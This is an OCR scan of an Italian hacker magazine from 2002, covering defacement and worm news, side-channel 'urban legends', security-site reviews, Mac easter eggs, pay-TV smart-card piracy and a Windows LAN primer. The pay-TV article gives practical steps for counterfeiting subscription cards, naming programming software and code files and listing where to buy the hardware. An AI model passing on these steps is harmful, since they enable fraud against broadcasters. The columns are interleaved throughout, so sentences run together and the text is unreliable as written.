ver 7.0 e 2000, Office 2000 e XP. Il programma gi- il nuovo scannerone di Microsoft può essere lan- ! CRACKER TUTTA
ra su Windows 2000 e Windows XP ma, attra- ciato anche a riga di comando attraverso l'ese- CASA E CHIESA.
verso una connessione di rete, è in grado di con- guibile "Mbsacli.exe". embra che i cracker di mezzo mondo
trollare anche i sistemi su cui giri Windows NT 4. Per scaricarlo: http:// download. micro- S abbiano intensificato gli attacchi
MBSA rimpiazza il precedente Microsoft Personal soft.com/download/win2000platform/ ai siti di carattere religioso in particolare
Security Advisor, uno scanner basato sul Web ri- Install/1.0/NT5XP/EN-US/mbsase- quelli cristiani e cattolici. Tra i quelli colpiti
lasciato nell'aprile del 2000 ed oggi non più attivo. tup.msi K vi sono anche due siti italiani dell'Università
Cattolica del Sacro Cuore. Il primo dei due,
http://www.dirigentiscuola.org/,
! LA “FIRMA DEL MAESTRO” è il sito del Centro d'Ateneo per l'Educazione
Permanente e a Distanza ed è stato
hi viola un sistema e opera il defacement di prontamente ripristinato. Il secondo è un proxy
C un sito Web, ha in genere uno scopo pre- server, http://proxyexit.bs.unicatt.it/. K
dominante: farsi conoscere!
Non contento del suo livello di popolarità, il
cracker italiano Spabaton ha deciso di inseri-
! A VOLTE
re sull'home page del comune di Cisternino, in RITORNANO…
provincia di Brindisi, un dettagliato elenco delle uove varianti del worm klez.g, klez.h
sue “bravate”, elencando tutte le intrusioni. Per N e klez.k si stanno rapidamente
non confondere il lettore tra tanti indirizzi elen- diffondendo a macchia d'olio.
cati, il cracker ha anche pensato di evidenziare Il worm contiene al suo interno un mail
i nomi dei siti che ritiene più importanti, e che server autonomo in grado di inviare mail
portano maggiore prestigio, con un apposito ad una grande quantità di utenti. Consigliamo
asterisco (Benelli, BBC, BancaMarche, SIAE, a tutti i lettori di aggiornare le proprie basi
Scavolini ecc.). K antivirus e di scaricare le fix apposite
sui siti dei maggiori produttori di antivirus. K
! LA GUERRA MEDIORIENTALE SI TRASFERISCE
IN INTERNET
Lo scontro tra israliani Ma il conflitto virtuale non si ferma al deface-
e palestinesi ormai non ment di siti appertenenti alle due fazioni in
si limita più al teatro fi- guerra.
sico delle operazioni Lo scontro si è spostato anche sul piano del-
che già di per sé risulta la satira, quella feroce, è stato messo infatti
piuttosto cruento, ma in circolazione un virus, Mylife, che una vol-
sembra essersi spostato anche in rete e si ta entrato nel sistema si insedia ma non pro-
combatte a colpi di intrusioni sui server delle cura come al solito perdite di dati o crash di ! CANCELLAZIONE
rispettive fazioni in lotta. sistema spettacolari e irrimediabili, bensì mo- FORZATA
Il servizio investigativo mi2g ha infatti rileva- stra una carica-
to che i domini aventi TLN ".il" hanno subito il tura piuttosto ir- a denuncia arriva dalla Lavasoft,
67 % di tutti i defacement realizzati nel corso riverente del pri- L produttrice di Adware, software che
delle ultime 2 settimane (10 dei 15 deface- mo ministro consente agli utenti di liberarsi di programmini
ment che sono stati contati in area medio- israeliano A. nascosti e web bug installati ad insaputa
rientale appartengono a domini israeliani). Sharon. K dell'utente da software con pochi scrupoli.
È Radlight, che, una volta installato, cancella
“NON HAI VERAMENTE CAPITO QUALCOSA FINO A QUANDO definitivamente dal proprio PC Adware,
NON SEI IN GRADO DI SPIEGARLO A TUA NONNA” privando gli utenti di uno degli strumenti più
preziosi contro gli spyware. K
Albert Einstein

www.hackerjournal.it |9
miti e leggende

LE LEGGENDE “METROPOLITANE” INFORMATICHE

Numeri da circo
e paranoia digitale
Può il lampeggiare di un led suggerire indicazioni sulle informazioni che vengono
trasmesse? Oppure: si può ricostruire la schermata di un PC “scannerizzando” la
fluorescenza del volto di chi ci sta seduto di fronte? Nella rete pullulano voci
assolutamente incredibili, ma non sempre si tratta di leggende metropolitane…

S urfando in giro per il web possia-


mo trovare una quantità di notizie,
articoli, scritti, se non studi veri e
propri, inerenti ai più svariati ed improbabili
argomenti: c’è qualcuno che ha tempo e su-
ricetta, dalla quale poter ottenere una bevan-
da assolutamente identica nell’aspetto e nel
gusto alla famosa bibita, per poi rilasciarla
sotto licenza GPL come fosse un software
open source.
mente su modem, router, schede di rete e
quant’altro, possano rappresentare un serio
rischio alla privacy dei nostri dati, rivelando ciò
che effettivamente passa attraverso queste pe-
riferiche.
dore da buttare nel descriverci per filo e per Tra le cose più intriganti, tuttavia, possiamo
segno come costruire una spada laser funzio- pescare alcuni studi, spesso molto seri e svolti >> Dimmi che Led hai
nante utilizzando comuni materiali acquistabi- in ambito accademico, che riguardano la teo-
li in supermercati e negozi di elettronica; gen- rizzazione di sistemi atti allo spionaggio, alla e ti dirò chi sei...
te che si prodiga nel trattare ed illustrare mille cattura di dati e alla sicurezza informatica.
maniere diverse di girarsi gli spinelli, o addirit- Joe Loughry, impiegato presso la Lockheed L’idea è che un led, illuminandosi in funzio-
tura chi ha fatto “reverse engineering” alla Martin, sostiene, per esempio, che il led in- ne del traffico di dati che il dispositivo riceve
Cocacola e ha pubblicato sul web la propria termittenti che lampeggiano frenetica- ed invia, funzioni “come una fibra ottica, ma

10 | www.hackerjournal.it
senza le fibre”. Il simpatico Joe ci fa sapere so, ma frequentando mailing list e forum ho reali che riguardano la sicurezza informatica.
che tutto questo sfarfallio di lucette rappresen- notato con quanta serietà venga letta la più Mentre cervelloni binari passano il tempo a
ta un “linguaggio binario interpretabile” e che assurda delle idee inerenti la sicurezza infor- disquisire su come annullare i campi elettro-
mediante un sensore ottico sia possibile carpi- matica e la privacy. magnetici generati da un monitor, una venti-
re le informazioni fino a ben venti metri di di- na di nuovi bachi vengono scoperti e altret-
stanza: la soluzione è rappresentata da qual- >> Tra scenari irreali tanti exploit pubblicati su securityfocus: in mez-
che metro di nastro adesivo atto a coprire zo a tutta questa confusione i più sensati ed in-
qualsiasi led sulle nostre periferiche. Lo studio e rischi concreti telligenti, per una volta, appaiono gli utenti
di Joe Loughry è reperibile @ http://ap- meno esperti e smaliziati, che si fanno
plied-math.org/optical_tempest.pdf. L’underground è paranoico e ciò gli è pecu- una risata e passano alla prossima.
Per quanto stramba possa apparire questa liare. Ogni più remota possibilità di sniffare Mentre magari inoltrano a tutti i
notizia, data l’effettiva quasi-impossibilità di password, carpire dati, violare in propri contatti l’ultima email-
una implementazione di questa tecnica di snif- qualche modo l’inte- bufala sfornata dall’en-
fing (perché di vero e proprio sniffing si tratte- grità di un si- nesimo ragazzino.
rebbe), la rete è tutt’altro che avara quando si stema infor- Per concludere,
tratta di propinarci simili studi: c’è chi è pron- matico vie- possiamo dire che
to a giurare che sia possibile catturare le in- ne presa in tutti questi studi e ri-
formazioni che passano attraverso un cavo di considera- cerche ci mostrano
rete utilizzando un qualche dispositivo che ri- zione e dis- scenari suggestivi e
levi le microscopiche variazioni nel campo cussa. spesso brillano per
elettromagnetico prodotto dal flusso di dati. E questo è l’originalità e le
senza dubbio competenze tecni-
un bene: i migliori che che denotano;
>> Hai la faccia come responsabili di sicurezza ma come al solito è me-
lo schermo... informatica sono quelli che glio tenere i piedi per terra e pren-
obbligano chiunque abbia un ac- dere roba del genere per quello che è: mate-
Non solo: tempo fa alcuni studenti ameri- cesso privilegiato alle macchine (anche fosse il riale per romanzi.
cani pubblicarono una loro ricerca nella qua- capo J) ad utilizzare smart password, e a cam-
le sostenevano la possibilità di ricostruire la biarle ogni 2 settimane; quelli che fanno im-
schermata di un monitor lontano anche cin- pazzire un cliente pretendendo che l’accesso FOLLIE IN RETE
quanta metri, mediante un apparecchio che FTP al server centrale sia effettuato da un solo
avrebbe dovuto rilevare le variazioni di cam- IP, che effettuano un test approfondito su qual- ! Tra invenzioni e paranormale:
po prodotte dal fascio di elettroni emesso siasi vulnerabilità conosciuta (anche quelle http://paranormal.about.com
dal tubo catodico. Su questa stessa linea, meno rischiose e all’apparenza più insignifi- ! Strane teorie e follie assortite:
più di recente, un altro studente americano ha canti)… e via così.
affermato che si potrebbe risalire ad una Ma la coerenza è spesso virtù dei folli: http://all-ez.com/science.htm
schermata “perfettamente leggibile” catturata quando si dibatte per giorni su che tipo di na- ! Tecno: http://www.geocities.com/
da un monitor, andando a scannerizzare il stro adesivo sia più utile usare per coprire quei CapeCanaveral/Lab/3354/index3.html
volto illuminato dalla fluorescenza dello scher- maledetti LED, si perdono di vista i problemi
mo di chi ci sta seduto davanti.
Alla via così: le teorie e le supposizioni sul
“cosa sarebbe possibile fare se” si sprecano e Secondo uno studio pubblicato on-
danno spunti a discussioni interminabili (spes- line, dalla scansione di un volto
so tra fisici ed ingegneri elettronici più che tra si può ricostruire la schermata del PC
informatici ed esperti di sicurezza), e se da un che aveva davanti: meglio prendere
lato tali “sparate” sembrano lasciare il tempo le opportune precauzioni...
che trovano, dall’altro appaiono suggestive e
geniali; ma c’è chi le prende sul serio.
Non voglio qui aprire un flame su argo-
menti tecnici e specifici, e possiamo anche
ammettere che tutti questi studi abbiano un
concreto fondo di verità (e probabilmente ce
l’hanno): ciò che maggiormente dà da riflette-
re è la paranoia con cui proprio l’ambiente
underground e quello più professionale della
sicurezza informatica accolgono tali informa-
zioni.
C’è davvero qualcuno che ha appiccicato
nastro adesivo sulle lucette del proprio
modem, o che ha buttato via il suo monitor
per comprarne uno a cristalli liquidi? Non lo

www.hackerjournal.it | 11
Un “occhio” nella rete
Nella rete si muove una comunità ricca di fermenti e di idee, alcuni si professano hacker,

Security Infos Onda Quadra


www2.securityinfos.com www.ondaquadra.cjb.net
Grande agglo- “Fino a quando
merato di noti- lo spirito umano
zie riguardanti sara' vivo, gli
proprio la sicu- hacker esiste-
rezza informati- ranno sempre.
ca, il sito di Se- Puo' darsi che
curity Infos è dovremo com-
stato anche il battere una bat-
primo ad aderi- taglia durissima
re alla nostra se continueremo
iniziativa e an- ad essere impri-
ch’esso collabo- gionati e vitti-
ra in modo attivo ai contenuti, arricchendo Hacker mizzati a causa del nostro desiderio di esplorare. Ma
Journal con il contributo di articoli e news che pro- questa repressione raggiungera' tutti gli obiettivi tran-
vengono da uno staff di collaboratori esperti e pre- ne quello di fermarci"
parati. E. Goldstein, editore di 2600
Oltre a scrivere per noi e fornire una preziosa consu-
lenza, quelli di Security Infos arricchiscono il loro sito Questa è la suggestiva introduzione di uno dei siti di
con aggiornamenti quotidiani e news che provengo- culto del WEB, quello di Onda Quadra, sottotilo
no da ogni angolo del web. “stampa clandestina”, che si pone come una vera e
Si trovano recensioni di tutti i prodotti, specie hard- propria rivista on-line dedicata al mondo della sicu-
ware, utilizzati in tema di sicurezza e testati in modo rezza. Si possono scaricare gli articoli zippati della e-
severo, con anteprime molto interessanti. zine e degli allegati.
Le sezioni tuttavia sono molte e si dipanano tra se- Pochi fronzoli e una grande quantità di contenuti al-
zione di Tools, Libri ed Eventi. Una vera e propria mi- la portata non proprio di tutti, ma soprattutto di un
niera di risorse della sicurity e dintorni. pubblico più tecnico.

Spaghetti Hacker Hacker Journal


www.spaghettihacker.it www.hackerjournal.it
“Spaghetti hacker Un po’ di auto ce-
e' un portolano, lebrazione non
una guida per le gusta mai...
rotte che attraver- Il nostro sito vuo-
sano il mondo an- le proporsi come
cora sconosciuto un contenitore
dell'hacking italia- non solo di risor-
no. Storie inedite, se ma, soprattut-
avventure dei pro- to come un pro-
tagonisti dell'un- getto Open Sour-
derground digita- ce dove è impor-
le, un movimento tante, anzi fonda-
con caratteristiche autonome rispetto a quello americano mentale, l’apporto di tutti coloro che vorranno partecipa-
che esprime una "via italiana" nel complesso tema del rap- re per inserire il proprio contributo e fare crescere il no-
porto fra l'uomo e la tecnologia. Una via fatta di gioco, in- stro contenitore web.
telligenza e passione per le macchine. Per la prima volta Nel sito trovano spazio Tools, ma soprattutto manuali per
grazie a questo libro e' possibile”. cercare di avere un approccio positivo all’argomento si-
Un libro, un sito, l’analisi di una realtà, quella degli hacker curezza.
italiani, poco conosciuta ma viva e attiva. Per cercare di capire come realizzare una LAN o come
Per conoscere meglio proprio la figura dell’hacker può tor- rendere un sistema informatico sicuro basta, scaricare
nare utile una visita al sito e, forse, anche l’acquisto del li- uno deitanti manuali/tutorial presenti.
bro omonimo, anche se non è nostro compito fare pubblici- Non mancano la chat e il forum per fare sentire la vostra
tà e non ce e viene una lira in tasca. voce, che ci auguriamo sia forte.
Nel sito sono contenuti diversi stralci. Ci aspettiamo un pubblico straripante , “rumoroso” e so-
Dimenticavamo gli autori: Neuro e Rubik, sono loro le “gui- prattutto curioso .
de” incaricate alla navigazione delle misteriose vie del Alla realizzazione del progetto ha collaborato in mod at-
WEB... tivo e prezioso il web -master di un’indirizzo web tra i pù
In pratica nostri “Caronti” d.o.c. noti della rete: 2600 Hertz.

12 | www.hackerjournal.it
altri semplici appassionati, Hacker Journal ha provato a radunarli sotto un’unica bandiera...

Security Focus Bismark


www.securityfocus.com www.bismark.it
In tema di sicu- Un punto di rife-
rezza e di analisi rimento molto
della vulnerabili- seguito nel setto-
tà di un sistema, re dei network
SecurityFocus security/ under-
rappresenta una ground è rappre-
delle compagnie sentato senz’al-
più avanzate che tro da Bismark
riversa in rete il che si presenta,
proprio know di fatto, come un
how di tutto ri- sito non solo di
spetto. Il sito, che risorse ma anche
riporta alla compagnia, presenta una serie di risorse di news, articoli e soprattutto di link. Quelli di Bismark
assolutamente preziose per valutare in modo concreto hanno aderito al nostro giornale e ne sono una “costo-
la sicurezza di un sistema e la vulnerabilità di un data la attiva”.
base. Nella sezione dei prodotti trova spazio, tra gli al- In home page trovano spazio le quattro anime princi-
tri, Aris Analyzer un sistema di sicurezza IT professio- pali di Bismark: la sezione news aggiornata quotidia-
nale che serve a monitorare in modo costante il traffico namente che riporta tutte le notizie più importanti in te-
e le intrusioni possibili all’interno di un server o un da- ma di sicurezza. Defaced, con una serie di link che ri-
ta base. Aris infatti analizza l’IP degli utenti collegati e portano ai siti “violati”. Non manca la sezione articoli
individua immediatamente quelli anonimi segnalando- che si muove tra tutorial veri e propri, come compilare
li come possibile fonte di un attacco informatico. Inoltre un Kernel, oppure un bel corso di Kyiliz, e riflessioni ap-
tiene traccia di tutti gli attacchi effettuati e consente di profondite sui temi più rilevanti del periodo.
individuarne la provenienza. Aris Analizer, come diver- Infine Gnomix dove trova spazio un nutrito archivio di
si altri prodotti, possono essere scaricati previa regi- software liberamente scaricabile e un altrettanto nutrita
strazione per testarne l’efficacia. sezione dedicata alla piattaforma Linux.

Punto informatico Security Flop


www.punto-informatico.it www.securityflop.it
E’ probabilmente il
sito italiano dedi- Il Papa è morto?
cato all’informa- No è vivo e vege-
zione tecnologica to... E’ solo una
più importante, si- delle notizie ri-
curamente il più portate da Secu-
autorevole. rity Flop che si
Un punto di riferi- occupa di segna-
mento storico per lare, appunto, i
tutti coloro che vi- sistemi di sicu-
vono a contato con rezza informatica
il settore delle che fanno Flop.
nuove tecnologie. Punto-informatico ha una sezione di news Nel caso specifico, ripreso poi anche da Hacker Journal,
assolutamente ineccepibile, aggiornata con grande frequen- il sistema violato è stato quello del sito di Rainews24 che
za e spesso punto fisso per la rassegna stampa di tutti gli aveva nel suo archivio un bel “coccodrillone” (così si
operatori del settore. Ma evidentemente Punto-informatico chiamano i necrologi scritti prima della morte della per-
non è solo un portale di informazione, per quanto ben conce- sona a cui sono rivolti) che è stato pescato nel server e
pito, la sua anima è molto più complessa e finisce per rap- svelato al popolo della rete. In home page ruotano tut-
presentare un portale verticale dedicato al mondo informati- te le notizie dei siti violati. L’aggiornamento è davvero
co in cui le risorse si fondono alla perfezione con le notizie. continuo e cliccando su ogni singola notizia si apre una
Nel sito trova spazio una sezione espressamente dedicata al- bella finestra Pop-Up dove si trova anche la foto del si-
la sicurezza e all’hacking, inutile dire che anche in questo ca- to attaccato e, spesso, degli effetti prodotti.
so la qualità del materiale contenuto è decisamente buona e Il sito si basa anche sulle segnalazioni generose degli
Punto-informatico cerca di catturare l’attenzione di una co- utenti in rete ed è presente un Forum per lo scambio di
munità, quella di chi si occupa a fattivamente di sicurezza, informazioni rilevanti in tema di attacchi informatici.
oppure di quelli che in qualche modo, anche solo per ricerca, Per avere un panorama veramente completo di tutte le
stanno dall’altra parte della barricata.Ottimo il motore di ri- violazioni di sistemi che si verificano quotidianamente,
cerca personalizzabile. un clic su questa url è davvero ben speso...

www.hackerjournal.it | 13
mac Hack

MA MA M A M AM AM AM AM A M A M A M A
GABOLE E TRUCCHI IN AMBIENTE MAC

Il lato oscuro della “Mela”

A
Quando si parla di tecniche di hacking, oppure di
scorribande informatiche, l’attenzione è sempre rivolta
a sistemi Windows o Linux, ma anche gli utenti Mac non
sono estranei a questo lato oscuro, anzi il System
MacOS classic e il recente “Aqua” hanno un’indole
particolarmente “diabolica”...

ASi
casm o i d b h sxb dxml T%d b % k B% ox
è sempre ripetuto ossessiva-
mente che gli utenti Macintosh
sono sempre stati un po’ dis-
criminati rispetto ai “cugini” PC compatibi-
li, la storia è sempre la stessa: i giochi ven-
gono sviluppati prima per PC, poi even-
>>Codici e codicilli

U na delle attività più in voga


per una certa fascia di utenti
Mac è la ricerca di codici per cracca-
*Po l cskh c s mxe

che diffondono codici per Mac testi-


monia un interesse crescente.
Forse il tutto è dovuto ad un costo
a volte eccessivo dei software, forse
il costo eccessivo è indotto proprio
tualmente, per Macintosh, Internet ha un re i programmi. Ovvero l’individua- dalla pirateria dilagante, ma la-
occhio di riguardo solo per i possessori di zione di chiavi informatiche che sciamo perdere questo circolo vizio-
Personal equipaggiati con sistemi Win- consentono di duplicare e fare fun- so e concentriamoci sui data-base
dows, tant’è che alcune pagine che utiliz- zionare programmi che altrimenti di codici. Per individuare i siti da cui
zano tecniche 3D non sono accessibili agli potrebbero essere utlizzati solo da scaricarli è sufficiente navigare un
utenti della Mela perché non è disponibile chi è in possesso della licenza origi- po’ e utilizzare le chiavi di ricerca
un plug-in dedicato per visualizzare le pa- nale. Evidentemente non si tratta di giusta come “crack”, “Mac” o giù di
gine… e via dicendo. In mezzo a queste un’attività lecita, i codici e codicilli lì. Tuttavia se non avete molta pa-
storie di ordinaria discriminazione verreb- potrebbero essere tranquillamente zienza un indirizzo prezioso è www.
be da pensare che anche in ambito sicu- quelli del codice penale perché si google.com/ mac.html qui trova
rezza e hacking il Mac abbia poco da di- tratta di attività illegale, tuttavia il spazio un motore di ricerca estre-
re, ma non è esattamente così… K proliferare in Internet di data base mamente efficiente. K

EASTER EGGS PER MAC

N on sono illegali, non


servono assoluta-
mente a nulla, a volte
Dreamweaver iTunes Internet Explorer 5 Photoshop 6

fanno pure arrabbiare


perché non funzionano.
Sono le “Eggs”, ovvero i Eseguite (Mela + F3) e
programmini nascosti al- selezionate un'
l’interno di programmi di immagine presente
grande diffusione e atti- nella pagina HTML su Aprite Photoshop e
vabili solo con combina- cui state lavorando. Aprite iTunes e Funziona con tutte tenete premuti i tasti
zioni segrete di tasti. Tenendo premuto il selezionate la voce le versioni 5.0 del Opzione + Mela e
Le Eggs sono inserite da- tasto Mela ed "Info su iTunes..." dal famoso browser. Basta selezionate dal menu
gli stessi sviluppatori per effettuando il doppio menu Mela e tenete scrivere nella barra Mela la voce "About
loro personale diverti- clic sull'anteprima premuto il tasto degli indirizzi Photoshop..." per
mento o per “staccare” visualizzata nella Opzione per invertire "about:tasman" (senza visualizzare una
da compiti più gravosi. parte sinistra della la visualizzazione dei virgolette). Il software simpatica immagine.
il Mac presenta una ricca finestra delle titoli. visualizzerà un easter
scelta di “uova proprietà, vedrete gli egg legato ai
pasquali”. sviluppatori. Cascading Style Sheets.

14 | HACKER JOURNAL | 04.2002


tvtips

IL FENOMENO DELLE SCHEDE PIRATA

i La Pay-tv a sbafo
Il problema sbandierato da Stream e Tele+ è noto:
gli utenti che hanno il privilegio di guardare i programmi
delle due pay-tv ammonta, grosso modo, a circa 4.5
milioni di unità. Bene? Non proprio: la metà circa è
rappresentata da possessori di schede tv pirata e sembra
che la quota sia destinata ad aumentare...

S tream conta oggi


800.000 abbonati, Te-
sottoscrizione di un abbonamento, ma al
momento permane questa situazione
scheda. Insomma con circa 55/60 Euro si
guarda la pay-tv a sbafo senza spendere i
le+ qualcosa come 1,5 mi- ibrida. circa 1.000 euro annuali dell’abbona-
lioni. Poi c’è il popolo degli Sul fronte Tele + si sta cercando di so- mento canonico.
utenti “ombra”, quelli che ufficialmente stituire il sistema Seca con il Seca 2, per
non risultano negli elenchi delle pay-tv, implementare la sicurezza e combattere in
ma che esistono… e guardano, eccome modo sempre più efficiente la pirateria. >>Pirati “onesti”
se guardano, grazie a schede non ufficia-
li, o smart-card, programmate reperendo Molti pirati praticanti dicono di pro-
tutte le risorse in Internet. >>Tutto in rete grammare per passione e si augurano vi-
vamente che tutti sottoscrivano almeno un
Realizzare una smart-card o wafer- abbonamento minimo per non esaspera-
>> I sistemi card pirata non è complicato come può re i gestori delle pay-tv: magari fanno
di codifica digitale sembrare. Il primo passo è quello di com- l’abbonamento a Tele+ poi scaricano i
prare una smart-card vergine, ovvero codici per vedere in chiaro la program-

N ell’attuale panorama della tv digitale


esistono diversi sistemi di codifica del
segnale, ognuno dei quali attaccabile in
programmabile. Si trova in qualsiasi ne-
gozio di elettronica di consumo e costa 15
euro circa.
mazione di “Palco”, comunque un bel ri-
sparmio.
Tutti i siti che divulgano materiale che
maniera diversa da chi vuole vedere i pro- Quindi bisogna reperire un program- riguarda la contraffazione di schede sono
grammi in chiaro senza spendere una lira matore, non una persona in carne e ossa fuorilegge, il fatto che siano situati su ser-
o comunque risparmiando in modo so- che “tarocchi” la scheda, ma un piccolo ver stranieri e gestiti magari in remoto da
stanzioso. aggeggio che si può acquistare via inter- amministratori italiani non mette questi ul-
Il sistema di codifica più attaccato net proprio dai siti in cui si reperiscono tut- timi al sicuro, almeno secondo le recenti
è il Seca, utilizzato da Tele+. Si calcola te le risorse per piratare le smart-card. Il interpretazioni giurisprudenziali della leg-
che nel 2001 sono stati venduti circa costo è di circa 40/50 Euro il tutto vie- ge 248 del 2000 sulla pirateria informa-
800.000 decoder Seca (Gold box) senza ne spedito comodamente a casa in modo tica che prevede pene fino a 5 anni di re-
abbonamento per essere attivati con anonimo e senza rischi. Poi bisogna repe- clusione.
Smart Card fasulle. Sul fronte Stream inve- rire il software per farlo funzionare, questo E’ perciò evidente che scovarli non sia
ce è presente un doppio sistema di codifi- lo si trova sempre in rete in modo del tut- semplice, ma basta avere pazienza e si tro-
ca: Irdeto e il nuovo Nds, più sicuro e affi- to gratuito. Infine servono i codici. Tutti i si- veranno tutti i codici del caso e i software
dabile, è infatti certo che la moltitudine di ti da cui è possibile scaricare i codici per necessari, ad esempio su diversi siti tede-
persone che contraffanno le schede per programmare le schede non sono censiti schi è disponibile un software, two-
Stream usano proprio il sistema Irdeto, te- dai motori di ricerca, sono ben mimetizza- prog23.exe, che permette di programmare
nuto in vita perché a tutt’oggi circa la me- ti nella rete e risiedono su server situati al- tutte le carte in circolazione o quasi tra cui:
tà degli abbonati ufficiali Stream possiede l’estero. atmel- waffer-goldwaffer-picard2-funcard.
un decoder Irdeto. Nei siti in questione è possibile scarica-
Probabile che a breve Stream cerchi re sia i software che i codici in formato Dove acquistare Smart-card
di svecchiare il parco decoder dei propri .hex. Inserirli nella scheda è poi un lavoro e programmatori:
utenti e punti decisamente sul quelli che di circa 15 minuti e il gioco è fatto. http://web.tiscali.it/italelectronics/
codificano il sistema Nds che, per la cro- Quando Tele+ cambia i codici basta http://www.mixotron.com/indexold.html
naca, possono essere venduti solo con la scaricarli dalla rete e riprogrammare la http://www.dimelonline.it/

www.hackerjournal.it | 15
PRATICA

COME COSTRUIRE UNA LAN SU MISURA

Introduzione alla LAN


Fare andare d’accordo più persone può essere estremamente complicato,
cercare di fare convivere più computer anche di più, specie se non si seguono
le regole basilari nella costruzione di una LAN

è l’acroni- Creare una rete


mo per Lo- di Pc può essere
“Lan” cal Area un’operazione molto
Network, complessa specie se
ossia network le “unità”collegate
locale: una rete di 2 o più macchine che sono numerose
condividono risorse tra loro, quali files, di-
schi, stampanti etc…
Avere diverse postazioni di lavoro inter-
connesse tra loro è senza dubbio molto
pratico, e praticamente necessario in tutte
quelle situazioni ove si renda necessario
poter fornire agli utenti la possibilità di
condividere tra loro dati e macchine: ba-
sti pensare al caso più classico, quello di
un qualsiasi ufficio che utilizzi computer, o
a tutti quei contesti in cui i calcolatori ven-
gono forniti all’utenza a scopo consultati-
vo (ospedali, fiere, musei etc…).
Ma a volere osservare più da vicino la
questione, possiamo iniziare a porci le so-
lite domande curiose: come funziona?
Com’è organizzata? Perché è importante
conoscere le reti locali sotto l’ottica della chiedono, e altre ancora hanno l’arduo “User”, ovvero chi sta usando quella
sicurezza informatica? compito J di permettere a tutte le po- determinata macchina. Per ovvi motivi
stazioni presenti sulla rete di uscire in organizzativi e di sicurezza, è necessa-
internet. rio identificare gli utenti che stanno uti-
>> Tutti insieme Un’ultima cosa, da tenere ben pre- lizzando un computer della LAN, in
appassionatamente sente: non sempre le reti sono omo- modo da poter stabilire regole atte a
genee, basate cioè su un solo sistema preservare l’integrità della rete stessa e
Come abbiamo già detto, una LAN operativo. In molti casi si rende neces- a garantire il corretto funzionamento
altro non è che un insieme di compu- sario connettere tra loro macchine che del sistema anche nel caso che uno tra
ter, collegati tra loro, che possono montano SO diversi: tipica è la situa- gli utilizzatori faccia qualche casino.
scambiarsi dati di vario tipo. zione in cui molti client Windows sono Per questo esistono differenti classifi-
Per cominciare volgeremo uno gestiti da un server Linux (ovviamente cazioni standard degli utenti: un nor-
sguardo alle reti basate su sistemi tramite un utilizzo corretto di determi- male utente, per esempio, avrà acces-
Windows NT, riservando a prossimi ar- nati software, per esempio SAMBA). so a determinate risorse; potrà usare
ticoli il compito di esaminare reti basa- determinati programmi e compiere de-
te su altri sistemi operativi, anche con- terminate operazioni.
siderata la relativa complessità gerar-
>> Scala gerarchica Un amministratore, al contrario,
chica su cui si basano le LAN costruite avrà maggior poteri e sarà in grado di
su questo SO. Tralasciando queste considerazioni, installare applicazioni, cancellare files
Difatti, all’interno di una rete i com- occupiamoci di una ipotetica LAN ba- o muovere database, nonché interveni-
puter non sono tutti uguali: alcuni svol- sata esclusivamente su Windows. Co- re sulle “leggi” che governano gli uten-
gono il compito di client, tipicamente me più volte abbiamo già detto, ci sa- ti normali. Le varie tipologie di utenza
usati dagli utenti per compiere il nor- ranno macchine utilizzate dai normali della LAN possono essere le più svaria-
male lavoro di tutti i giorni; altre mac- utenti come postazioni di lavoro, dette te: a volte si rende necessario delegare
chine si occupano, per esempio, di for- workstation. Esse all’avvio, richiedono a un gruppo di utenti determinati pote-
nire ai client una lista di tutte le risorse all’utente una autenticazione: è infatti ri, e ad un altro gruppo differenti. Per
presenti sulla rete quando questi la ri- molto importante il concetto di questo è altresì importante il concetto

16 | HACKER JOURNAL | 04.2002


In una rete, naturalmente, le mac-
chine sono identificate da un indirizzo INDIRIZZI IP
IP. Essendo parecchio difficile, per noi
comuni esseri mortali, ricordare a me- IN PRATICA
moria una serie di 4 numeri variabili in In una LAN
un intervallo da 0 a 256, ecco un ser- è necessario
vizio di risoluzione dei nomi: WINS, ov- definire
vero Windows Internet Name Service. quella che
In una rete locale vi è solitamente una viene
macchina che svolge questo compito chiamata “IP
(può sempre essere il PDC, in reti di subnet mask”,
piccole dimensioni): essa contiene una ovvero una
database “nome macchina – IP corri- classe di IP che accomuni
di gruppo di utenti: un raggruppamen- spondente – servizi svolti” che di fatto tutte le postazioni di
to di utenti a cui assegnare regole – più fornisce una mappa di tutte le risorse lavoro: in reti Windows è
propriamente politiche o policies – in disponibili sulla LAN. classica la 192.168.x.x (per
modo generale. reti di ampie dimensioni), o
la 192.168.159.x (per reti di
>> Made in Windows minore portata). Si attua
>> Il client questo 2000 questa “mascheratura” degli
sconosciuto indirizzi, ad esempio, per
E’ bene tener presente che nelle re- suddividere due differenti
Data una velocissima occhiata a ti basate su Windows 2000 molte di reti: ad un piano di un
utenti&co, passiamo ai queste “regole” sono mu- palazzo che ospita gli uffici
computer: oltre ai soliti tate: si è persa la distin- di una azienda, per esempio,
client avremo, tipicamen- zione tra PDC e BDC, in si userà 192.168.1.x, e ad
te, altre macchine atte a quanto in una rete pos- ogni singolo client verranno
identificare gli utenti: sono essere presenti più assegnati ip quali
computer, cioè, in pos- PDC che lavorano con- 192.168.1.1, 192.168.1.2,
sesso del database con- temporaneamente, e il 192.168.1.3, e così via.
tenente tutti gli utenti al servizio WINS è stato so- Al piano superiore dello
quale il computer stesso stituito da un normale stesso palazzo ci potrebbe
fa riferimento quando i DNS (Domain Name Ser- essere un’altra rete che non
client gli richiedono l’au- vice, utilizzato comune-
tenticazione. mente in Internet).
Oltre a tale funzione, questa mac- Tutte queste migliorie, però, non ga-
china, chiamata PDC (acronimo per rantiscono la compatibilità completa in
Primary Domain Controller) svol- una rete gestita da macchine Windows
ge anche altri importanti compiti: essa NT 4 insieme ad altre Windows 2000,
ospita infatti anche i database relativi e in alcuni casi (anche se Microsoft, uf-
a gruppi di utenti e acl, e nella stra- ficialmente, lo sconsiglia) è necessario
grande maggioranza dei casi svolge ad esempio tenere comunque un server
anche il compito di master browser; WINS per garantire il corretto funziona-
fornisce cioè la lista di tutte le risorse mento della LAN mediante macchine
disponibili, al momento della chiama- NT 4.
ta, sulla LAN. Quanto detto rappresenta solo una
Altro dettaglio da tenere a mente: il semplice infarinatura di alcuni ele- è in diretta comunicazione
PDC può anche avere funzione di Net- menti essenziali di una rete basata su con la precedente e che avrà
Logon Server; fornire cioè ai client tutti Windows: esistono molti diversi servizi una subnet mask del tipo
gli script e procedure di avvio che ven- che è possibile implementare in una 192.168.2.x.
gono lanciati ogniqualvolta un client LAN (non tocchiamo nemmeno l’argo- Quando le postazioni di una
effettua un logon sulla rete. mento Active Directory), e infatti la do- di queste reti accedono ad
Il PDC viene spesso affiancato (spe- cumentazione sulla infrastruttura di re- internet non lo fanno
